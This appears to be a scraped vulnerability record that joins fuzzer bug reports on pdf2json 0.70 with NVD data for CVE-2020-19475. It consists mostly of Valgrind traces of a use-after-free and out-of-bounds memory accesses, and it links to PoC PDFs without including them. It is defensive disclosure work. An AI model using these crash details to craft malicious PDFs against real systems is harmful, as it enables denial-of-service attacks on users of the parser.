0x40328C: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:88) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2afa0 is 0 bytes inside a block of size 16 free'd ==22556== at 0x4C2F74B: operator delete[](void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48C698: GString::~GString() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x469472: GfxFont::~GfxFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C587: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46C5D7: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E80F: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x48E420: GString::resize(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x48C1C7: GString::GString(char const*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x468F8C: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 4 ==22556== at 0x467E4E: GfxFont::getType() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x462C66: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2b068 is 40 bytes inside a block of size 4,584 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46C5E3: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x469005: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x4636BD: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2b040 is 0 bytes inside a block of size 4,584 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46C5E3: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x469005: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== pure virtual method called terminate called without an active exception ==22556== ==22556== Process terminating with default action of signal 6 (SIGABRT) ==22556== at 0x5710428: raise (raise.c:54) ==22556== by 0x5712029: abort (abort.c:89) ==22556== by 0x4EC984C: __gnu_cxx::__verbose_terminate_handler() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21) ==22556== by 0x4EC76B5: ??? (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21) ==22556== by 0x4EC7700: std::terminate() (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21) ==22556== by 0x4EC823E: __cxa_pure_virtual (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21) ==22556== by 0x463726: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== HEAP SUMMARY: ==22556== in use at exit: 321,643 bytes in 2,154 blocks ==22556== total heap usage: 6,498 allocs, 4,344 frees, 577,716 bytes allocated ==22556== ==22556== LEAK SUMMARY: ==22556== definitely lost: 16 bytes in 1 blocks ==22556== indirectly lost: 8 bytes in 1 blocks ==22556== possibly lost: 0 bytes in 0 blocks ==22556== still reachable: 321,619 bytes in 2,152 blocks ==22556== of which reachable via heuristic: ==22556== newarray : 264 bytes in 1 blocks ==22556== suppressed: 0 bytes in 0 blocks ==22556== Rerun with --leak-check=full to see details of leaked memory ==22556== ==22556== For counts of detected and suppressed errors, rerun with: -v ==22556== ERROR SUMMARY: 33 errors from 18 contexts (suppressed: 0 from 0) Aborted ~~~ Thanks, Manh Dung
SEGV (use after free) on Gfx::doShowText
https://api.github.com/repos/flexpaper/pdf2json/issues/35/comments
0
2019-05-29T15:08:20Z
2019-05-29T15:08:20Z
https://github.com/flexpaper/pdf2json/issues/35
449,865,114
35
2,223
CVE-2020-19475
2021-07-21T18:15:08.883
An issue has been found in function CCITTFaxStream::lookChar in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid write of size 2 .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/flexpaper/pdf2json/issues/36
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to an invalid write on the function CCITTFaxStream::lookChar (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_seg_CCITTFaxStream::lookChar Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==15436== Memcheck, a memory error detector ==15436== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==15436== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==15436== Command: ./pdf2json ./PoC_segv_CCITTFaxStream::lookChar /dev/null ==15436== ... ==15436== Invalid write of size 2 ==15436== at 0x431600: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x43162B: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43FA44: XRef::fetch(int, int, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4284A9: Object::fetch(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A565: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== ==15436== Invalid read of size 2 ==15436== at 0x43154B: CCITTFaxStream::lookChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43ADDC: CCITTFaxStream::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x40947A: Object::streamGetChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48796F: Lexer::getChar() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x4884FD: Lexer::getObj(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489C19: Parser::shift() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489825: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454759: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== Address 0x5b100bc is 0 bytes after a block of size 108 alloc'd ==15436== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==15436== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x43051F: CCITTFaxStream::CCITTFaxStream(Stream*, int, int, int, int, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42CE76: Stream::makeFilter(char*, Stream*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x42C6AF: Stream::addFilters(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489AFF: Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==15436== by 0x489549: Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) (in 